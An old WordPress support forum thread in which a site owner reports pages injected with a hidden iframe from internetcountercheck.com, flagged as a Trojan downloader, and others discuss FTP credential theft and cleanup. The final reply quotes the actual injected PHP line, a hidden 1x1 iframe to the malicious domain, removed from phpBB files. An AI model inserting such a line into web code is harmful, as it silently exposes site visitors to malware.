site hacked – internetcountercheck.com/?click#95609

  • Resolved Boris

    (@travel-junkie)


    15 years, 2 months ago

    Hello,

    I have a site and it got hacked a few days ago. I tried to delete all files and upload them again, but the virus warning appeared again a short while later.

    What happened was that on many pages there was suddenly an iframe from internetcountercheck.com.

    My anti virus programme shows me this warning:

    internetcountercheck.com/?click#95609
    Trojan-Downloader.JS.Tabletka.a

    I googled that website and now there are already around 1000 hits. When my site got hit it was only a handful, so maybe that thing is spreading 🙂

    Does anyone have any suggestions on what else I could do to get rid of this short of completely demolishing everything?

    When I set the site up I had changed the database prefix, changed the admin login, hid the wp version number, but it still happened. I’m running WP 2.8, and the usual array of plugins, like bad behaviour, nextgen gallery, wordtube, all in one seo and a few others, all of them up to date or at least they were. I’m in India at the moment and I can’t really access the site anymore. As soon as I do my internet connection slows down to a crawl and after a while my laptop surrenders…

    Any help would really be appreciated.

    Cheers!
    Boris

Viewing 13 replies - 1 through 13 (of 13 total)
  • jingles689

    (@jingles689)

    15 years, 2 months ago

    do you use a host service? Look at what happened to mine today:
    homeiswherethecarsparked.com, it has a big black owned hack page on it and my self host service is sorting it out, this is a big problem with wordpress.org blogs, it open source and anyone can screw it

    whooami

    (@whooami)

    15 years, 2 months ago

    umm..

    I’m running WP 2.8

    and where did you get that? since the latest version of wordpress is 2.7.1

    jingles689

    (@jingles689)

    15 years, 2 months ago

    2.8?

    jingles689

    (@jingles689)

    15 years, 2 months ago

    WP 2.8 demo http://demo.talkpress.de/trunk/

    ziation

    (@ziation)

    15 years, 2 months ago

    Open source has nothing to do with secure software. Anyone who suggests it does has no clue what they are talking about. Security through obscurity is not an approved method and should never be relied upon. Look at Windows and Internet Explorer, they are closed source and are the most hacked pieces of software around.

    You should leave your host for ignorance alone.

    Thread Starter Boris

    (@travel-junkie)

    15 years, 2 months ago

    whooami, it’s called SVN 🙂

    we’re still being haunted by that bloody iframe, but apparently the people behind it somehow got our ftp credentials (our hosting service told us that the files were uploaded via ftp), so we changed those. Today I had a look and it’s come again…

    t31os

    (@t31os)

    15 years, 2 months ago

    Then host is not storing your account information securely, or someone else with FTP details yourself or another admin has been infected and is unknowningly supplying details to these individuals.

    If you’re the only one with access to the details, it’s either you or the host.

    If you’re confident it’s not you, then get a decent host who can secure you account and/or FTP details properly.

    UseShots

    (@useshots)

    15 years, 2 months ago

    @travel-junkie: What FTP client do you use? Do you store your FTP passwords inside it? Some spyware programs can steal passwords from program settings.

    Thread Starter Boris

    (@travel-junkie)

    15 years, 2 months ago

    I use filezilla and yes, i do store my details in there.

    My host is all-inkl and they are usually excellent.

    thesystemroot

    (@thesystemroot)

    15 years, 2 months ago

    Hi,I have the same problem with my blog, the host might be the culprit?.
    As I have tried changing the administrator password, and FTP that can no longer be.

    bernardborealis

    (@bernardborealis)

    15 years, 2 months ago

    Maybe this will help:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    Additionally, if you have register_globals enabled that may cause a hack. If you have too lenient of permissions that may cause a hack as well. Usually you will not need higher permissions than 755 on directories and 644 on files. -Just some more stuff to throw into the melee.

    Thread Starter Boris

    (@travel-junkie)

    15 years, 2 months ago

    Turned out that after we had changed the ftp password one file didn’t get overwritten when we uploaded WP again, so changing the ftp password does help.

    y-e

    (@y-e)

    14 years, 4 months ago

    the attack is same with me..
    that happened to my phpBB…

    target file (for phpBB):

    1. includes/session.php
    2. includes/acp/acp_main.php

    I still dont know how to secure my phpBB bcoz the version was old.
    Im lazy to download n reinstall that phpBB new version…

    For temporary, I just fix my phpBB by removing this code in those two files:

    echo “<iframe src=\”http://internetcountercheck.com/?click=82845921\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘site hacked – internetcountercheck.com/?click#95609’ is closed to new replies.

Tags